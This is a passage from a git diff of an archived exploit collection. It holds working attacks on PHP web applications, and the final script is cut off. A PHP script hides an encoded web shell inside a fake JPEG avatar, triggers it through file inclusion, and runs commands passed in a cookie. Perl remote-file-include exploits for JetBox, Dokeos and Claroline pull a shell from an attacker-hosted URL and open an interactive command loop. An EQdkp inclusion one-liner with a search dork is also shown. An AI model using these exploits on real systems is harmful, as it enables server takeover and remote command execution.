+$packet.="Connection: Keep-Alive\r\n"; +$packet.="Cache-Control: no-cache\r\n"; +$packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +$temp=explode("Set-Cookie: ",$html); +$temp2=explode(' ',$temp[1]); +$cookie=$temp2[0]; +echo 'Your cookie: '.$cookie."\r\n"; +$temp=explode("fusion_user=",$cookie); +$temp2=explode(".",$temp[1]); +$user_id=trim($temp2[0]); +echo 'Your user id: '.$user_id."\r\n"; + +echo "step 2 -> upload a malicious avatar with php code inside...\r\n"; +$avatar=".php.php.gif-fakechars-"; +$shell= +chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f). 
+chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70). +chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22). +chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70). +chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29). +chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73). +chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f). +chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f). +chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74). +chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73). +chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f). +chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29). +chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74). +chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71). +chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70). +chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24). +chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b). +chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72). +chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65). +chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f). +chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d). +chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20). +chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61). +chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c). +chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45). 
+chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65). +chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38). +chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d). +chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28). +chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63). +chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75). +chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70). +chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d). +chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a). +chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00). +chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00). +chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). 
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff). +chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01). +chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03). +chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08). +chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4). +chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00). +chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03). +chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f). 
+chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00); + +/* +this image has this code inside as EXIF metadata content +<?php +$fp=fopen("suntzu.php","w"); +fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>"); +fclose($fp); +chmod("suntzu.php",777); +?> +*/ + +$data='-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_name" + +'.$username.' +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_newpassword" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_newpassword2" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_email" + +succcccccp@hotmail.com +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_hide_email" + +1 +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_location" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_month" + +-- +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_day" + +-- +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_year" + +---- +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_aim" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_icq" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_msn" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_yahoo" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_web" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_theme" + +Default +-----------------------------7d6ee3a7074a 
+Content-Disposition: form-data; name="user_offset" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_avatar"; filename="'.$avatar.'" +Content-Type: application/octet-stream + +'.$shell.' +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_sig" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_hash" + +'.md5($pass).' +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="update_profile" + +Update Profile +-----------------------------7d6ee3a7074a-- +'; + + +$packet ="POST ".$p."edit_profile.php? HTTP/1.0\r\n"; +$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; +$packet.="Referer: http://".$host.$path."edit_profile.php\r\n"; +$packet.="Accept-Language: en\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6ee3a7074a\r\n"; +$packet.="Accept-Encoding: gzip, deflate\r\n"; +$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Keep-Alive\r\n"; +$packet.="Cookie: fusion_visited=yes; ".$cookie." 
PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n"; +$packet.="Cache-Control: no-cache\r\n\r\n"; +$packet.=$data; +sendpacketiii($packet); + +echo "step 3 -> try to launch code inside image before has chmod()...\r\n"; +for ($i=0; $i<=9; $i++) +{ +$packet ="GET ".$p."images/avatars/.php.php[".$user_id."].gif-fakechars- HTTP/1.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +} + +echo "step 3b -> try to include through last_seen_users_panel.php\r\n"; +//works with register_globals=on & magic_quotes_gpc=off +$xpl=urlencode("../../../../images/avatars/.php.php[".$user_id."].gif-fakechars-".chr(0x00)); +$packet ="GET ".$p."infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=$xpl HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); + +echo "step 3c -> try to include through setup.php script\r\n"; +//works with magic_quotes_gpc=off +$xpl=urlencode("../images/avatars/.php.php[".$user_id."].gif-fakechars-".chr(0x00)); +$packet ="GET ".$p."setup.php?localeset=$xpl HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); + +echo "step 4 -> delete avatar...\r\n"; +$data='-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_name" + +'.$username.' 
+-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_newpassword" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_newpassword2" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_email" + +whattttt@hotmail.com +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_hide_email" + +1 +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_location" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_month" + +-- +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_day" + +-- +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_year" + +---- +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_aim" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_icq" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_msn" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_yahoo" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_web" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_theme" + +Default +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_offset" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_avatar"; filename="whatever" +Content-Type: application/octet-stream + +what +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_sig" + + +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="user_hash" + +'.md5($pass).' 
+-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="update_profile" + +Update Profile +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="del_avatar" + +y +-----------------------------7d6ee3a7074a-- +'; + +$packet ="POST ".$p."edit_profile.php HTTP/1.0\r\n"; +$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; +$packet.="Referer: http://".$host.$path."edit_profile.php\r\n"; +$packet.="Accept-Language: en\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6ee3a7074a\r\n"; +$packet.="Accept-Encoding: gzip, deflate\r\n"; +$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Keep-Alive\r\n"; +$packet.="Cookie: fusion_visited=yes; ".$cookie." PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n"; +$packet.="Cache-Control: no-cache\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); + +echo "step 5 -> launch commands...\r\n"; +for ($i=0; $i<=count($mypaths)-1; $i++) +{ +$packet ="GET ".$p.$mypaths[$i]."suntzu.php HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: cmd=".$cmd.";\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +if (strstr($html,"56789")) +{ + echo "Exploit succeeded..."; + $temp=explode("56789",$html); + die("\r\n".$temp[1]."\r\n"); +} +} +//if you are here... +echo "\r\nExploit failed..."; +?> + +# milw0rm.com [2006-05-07] diff --git a/platforms/php/webapps/1761.pl b/platforms/php/webapps/1761.pl index 1405f441d..e7ba27d0d 100755 --- a/platforms/php/webapps/1761.pl +++ b/platforms/php/webapps/1761.pl 
@@ -1,83 +1,83 @@
-#!/usr/bin/perl
-############
-# JetBox CMS Remote File Include
-# Exploit & Advisorie: beford <xbefordx gmail com>
-#
-# uso:# perl own.pl <host> <cmd-shell-url> <cmd-var>
-# perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd
-#
-# cmd shell example: <? system($cmd); ?>
-# cmd variable: cmd;
-#
-#############
-# Description
-###########
-# Vendor: http://jetbox.streamedge.com/
-# The file jetbox/includes/phpdig/includes/config.php uses the variable
-# relative_script_path in a include() function without being declared.
-# This issue has already been fixed in phpdig, but jetbox still uses a
-# vulnerable version.
-############
-# Vuln code
-############
-#if (is_file("$relative_script_path/locales/$phpdig_language-language.php"))
-# {include "$relative_script_path/locales/$phpdig_language-language.php";}
-#else
-# {include "$relative_script_path/locales/en-language.php";}
-############
-
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
-head();
-while()
-{
- print "[shell] \$";
- while(<STDIN>) {
- $cmd=$_;
- chomp($cmd);
- if (!$cmd) {last;}
- $xpl = LWP::UserAgent->new() or die;
- $req = HTTP::Request->new(GET =>$Path.'includes/phpdig/includes/config.php?relative_script_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
- $res = $xpl->request($req);
- $return = $res->content;
- $return =~ tr/[\n]/[ê]/;
-
- if ($return =~/Error: HTTP request failed!/ ) {
- print "\nInvalid path for phpshell\n";
- exit;
- } elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
- print "\nComando Invalido, o no hubo respuesta\n\n";
- }
- if ($return =~ /(.*)/) {
- $finreturn = $1;
- $finreturn=~ tr/[ê]/[\n]/;
- print "\r\n$finreturn\n\r";
- last;
- } else {
- print "[shell] \$";
- }
-
- }
-
-} last;
-
-sub head() {
- print "\n============================================================================\r\n";
- print " JetBox CMS Remote File Include\r\n";
- print "============================================================================\r\n";
- }
-
-sub usage() {
- head();
- print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
- print " <host> - Full Path : http://host/jetbox/ [remember the trailing slash noob]\r\n";
- print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
- print " <var> - var name used in phpshell : cmd \r\n";
- exit();
- }
-
-# milw0rm.com [2006-05-07]
+#!/usr/bin/perl
+############
+# JetBox CMS Remote File Include
+# Exploit & Advisorie: beford <xbefordx gmail com>
+#
+# uso:# perl own.pl <host> <cmd-shell-url> <cmd-var>
+# perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd
+#
+# cmd shell example: <? system($cmd); ?>
+# cmd variable: cmd;
+#
+#############
+# Description
+###########
+# Vendor: http://jetbox.streamedge.com/
+# The file jetbox/includes/phpdig/includes/config.php uses the variable
+# relative_script_path in a include() function without being declared.
+# This issue has already been fixed in phpdig, but jetbox still uses a
+# vulnerable version.
+############
+# Vuln code
+############
+#if (is_file("$relative_script_path/locales/$phpdig_language-language.php"))
+# {include "$relative_script_path/locales/$phpdig_language-language.php";}
+#else
+# {include "$relative_script_path/locales/en-language.php";}
+############
+
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
+head();
+while()
+{
+ print "[shell] \$";
+ while(<STDIN>) {
+ $cmd=$_;
+ chomp($cmd);
+ if (!$cmd) {last;}
+ $xpl = LWP::UserAgent->new() or die;
+ $req = HTTP::Request->new(GET =>$Path.'includes/phpdig/includes/config.php?relative_script_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+ $res = $xpl->request($req);
+ $return = $res->content;
+ $return =~ tr/[\n]/[ê]/;
+
+ if ($return =~/Error: HTTP request failed!/ ) {
+ print "\nInvalid path for phpshell\n";
+ exit;
+ } elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
+ print "\nComando Invalido, o no hubo respuesta\n\n";
+ }
+ if ($return =~ /(.*)/) {
+ $finreturn = $1;
+ $finreturn=~ tr/[ê]/[\n]/;
+ print "\r\n$finreturn\n\r";
+ last;
+ } else {
+ print "[shell] \$";
+ }
+
+ }
+
+} last;
+
+sub head() {
+ print "\n============================================================================\r\n";
+ print " JetBox CMS Remote File Include\r\n";
+ print "============================================================================\r\n";
+ }
+
+sub usage() {
+ head();
+ print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
+ print " <host> - Full Path : http://host/jetbox/ [remember the trailing slash noob]\r\n";
+ print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
+ print " <var> - var name used in phpshell : cmd \r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-05-07]
diff --git a/platforms/php/webapps/1764.txt b/platforms/php/webapps/1764.txt
index 7752e9852..16e905d74 100755
--- a/platforms/php/webapps/1764.txt
+++ b/platforms/php/webapps/1764.txt
@@ -1,9 +1,9 @@
-Title: EQdkp <= 1.3.0 Remote File Inclusion
-URL: http://www.eqdkp.com/
-Dork: "powered by EQdkp"
-Author: OLiBekaS
-greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew
-
-Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-05-07]
+Title: EQdkp <= 1.3.0 Remote File Inclusion
+URL: http://www.eqdkp.com/
+Dork: "powered by EQdkp"
+Author: OLiBekaS
+greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew
+
+Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-05-07]
diff --git a/platforms/php/webapps/1765.pl b/platforms/php/webapps/1765.pl
index 26c9002cc..a81ca6c72 100755
--- a/platforms/php/webapps/1765.pl
+++ b/platforms/php/webapps/1765.pl
@@ -1,75 +1,75 @@
-#!/usr/bin/perl
-############
-# Dokeos Learning Management System 1.6.4 Remote File Include
-# Exploit & Advisorie: beford <xbefordx gmail com>
-#
-# uso:# perl own.pl <host> <cmd-shell-url> <cmd-var>
-# perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd
-#
-# cmd shell example: <? system($cmd); ?>
-# cmd variable: cmd;
-#
-#############
-# Description
-#############
-# Vendor: http://www.dokeos.com/
-# The file dokeos/claroline/auth/ldap/authldap.php uses the variable
-# includePath in a include() function without being declared.
-# This issue has already been fixed in current claroline.net version,
-# but dokeos still uses a vulnerable version.
-############
-# Vulnerable code
-############
-# include ("$includePath/../auth/ldap/ldap_var.inc.php");
-############
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
-head();
-while() {
- print "[shell] \$";
- while(<STDIN>) {
- $cmd=$_;
- chomp($cmd);
- if (!$cmd) {last;}
- $xpl = LWP::UserAgent->new() or die;
- $req = HTTP::Request->new(GET =>$Path.'claroline/auth/ldap/authldap.php?includePath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
- $res = $xpl->request($req);
- $return = $res->content;
- $return =~ tr/[\n]/[ê]/;
- if ($return =~/Error: HTTP request failed!/ ) {
- print "\nInvalid path for phpshell\n";
- exit;
- } elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
- print "\nInvalid Command, error.\n\n";
- }
- if ($return =~ /(.*)/) {
- $finreturn = $1;
- $finreturn=~ tr/[ê]/[\n]/;
- print "\r\n$finreturn\n\r";
- last;
- } else {
- print "[shell] \$";
- }
- }
-} last;
-
-sub head() {
- print "\n============================================================================\r\n";
- print " Dokeos Learning Management System Remote File Include\r\n";
- print "============================================================================\r\n";
- }
-
-sub usage() {
- head();
- print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
- print " <host> - Full Path : http://host/dokeos/ \r\n";
- print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
- print " <var> - var name used in phpshell : cmd \r\n\r\n";
- exit();
- }
-
-# milw0rm.com [2006-05-08]
+#!/usr/bin/perl
+############
+# Dokeos Learning Management System 1.6.4 Remote File Include
+# Exploit & Advisorie: beford <xbefordx gmail com>
+#
+# uso:# perl own.pl <host> <cmd-shell-url> <cmd-var>
+# perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd
+#
+# cmd shell example: <? system($cmd); ?>
+# cmd variable: cmd;
+#
+#############
+# Description
+#############
+# Vendor: http://www.dokeos.com/
+# The file dokeos/claroline/auth/ldap/authldap.php uses the variable
+# includePath in a include() function without being declared.
+# This issue has already been fixed in current claroline.net version,
+# but dokeos still uses a vulnerable version.
+############
+# Vulnerable code
+############
+# include ("$includePath/../auth/ldap/ldap_var.inc.php");
+############
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
+head();
+while() {
+ print "[shell] \$";
+ while(<STDIN>) {
+ $cmd=$_;
+ chomp($cmd);
+ if (!$cmd) {last;}
+ $xpl = LWP::UserAgent->new() or die;
+ $req = HTTP::Request->new(GET =>$Path.'claroline/auth/ldap/authldap.php?includePath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+ $res = $xpl->request($req);
+ $return = $res->content;
+ $return =~ tr/[\n]/[ê]/;
+ if ($return =~/Error: HTTP request failed!/ ) {
+ print "\nInvalid path for phpshell\n";
+ exit;
+ } elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
+ print "\nInvalid Command, error.\n\n";
+ }
+ if ($return =~ /(.*)/) {
+ $finreturn = $1;
+ $finreturn=~ tr/[ê]/[\n]/;
+ print "\r\n$finreturn\n\r";
+ last;
+ } else {
+ print "[shell] \$";
+ }
+ }
+} last;
+
+sub head() {
+ print "\n============================================================================\r\n";
+ print " Dokeos Learning Management System Remote File Include\r\n";
+ print "============================================================================\r\n";
+ }
+
+sub usage() {
+ head();
+ print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
+ print " <host> - Full Path : http://host/dokeos/ \r\n";
+ print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
+ print " <var> - var name used in phpshell : cmd \r\n\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-05-08]
diff --git a/platforms/php/webapps/1766.pl b/platforms/php/webapps/1766.pl
index 38e66b8e7..8e970f6bf 100755
--- a/platforms/php/webapps/1766.pl
+++ b/platforms/php/webapps/1766.pl
@@ -1,89 +1,89 @@
-#!/usr/bin/perl
-############
-# Claroline Open Source e-Learning 1.7.5 Remote File Include
-# Exploit & Advisorie: beford <xbefordx gmail com>
-#
-# uso:# perl own.pl <host> <cmd-shell-url> <cmd-var>
-# perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd
-#
-# cmd shell example: <? system($cmd); ?>
-# cmd variable: cmd;
-#
-#############
-# Description
-#############
-# Vendor: http://www.claroline.net
-# The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable
-# clarolineRepositorySys in a include() function without being declared.
-# There are other files vulnerable in the same folder, this exploit only
-# attacks ldap.inc.php
-#
-# There is other vulnerable file claroline/auth/extauth/casProcess.inc.php
-# it uses the claro_CasLibPath in a include function but this is not being
-# declared either, so pwnt, RFI. Vendor was contacted through email,
-# no response, so i just posted this here and on its forum.
-############
-# Vulnerable code (lda.inc.php)
-############
-# return require $clarolineRepositorySys.'/auth/extauth/extAuthProcess.inc.php';
-############
-# Vulnerable code (casProcess.inc.php)
-############
-#if ( ! isset($_SESSION['init_CasCheckinDone'] )
-# || $logout
-# || ( basename($_SERVER['SCRIPT_NAME']) == 'login.php' && isset($_REQUEST['authModeReq']) && $_REQUEST['authModeReq'] == 'CAS' )
-# || isset($_REQUEST['fromCasServer']) )
-#{
-# include_once $claro_CasLibPath;
-############
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
-head();
-while() {
- print "[shell] \$";
- while(<STDIN>) {
- $cmd=$_;
- chomp($cmd);
- if (!$cmd) {last;}
- $xpl = LWP::UserAgent->new() or die;
- $req = HTTP::Request->new(GET =>$Path.'extauth/drivers/ldap.inc.php?clarolineRepositorySys='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
- $res = $xpl->request($req);
- $return = $res->content;
- $return =~ tr/[\n]/[ê]/;
- if ($return =~/Error: HTTP request failed!/ ) {
- print "\nInvalid path for phpshell\n";
- exit;
- } elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
- print "\nInvalid Command, error.\n\n";
- }
- if ($return =~ /(.*)/) {
- $finreturn = $1;
- $finreturn=~ tr/[ê]/[\n]/;
- print "\r\n$finreturn\n\r";
- last;
- } else {
- print "[shell] \$";
- }
- }
-} last;
-
-sub head() {
- print "\n============================================================================\r\n";
- print " Claroline Open Source e-Learning 1.7.5 Remote File Include\r\n";
- print "============================================================================\r\n";
- }
-
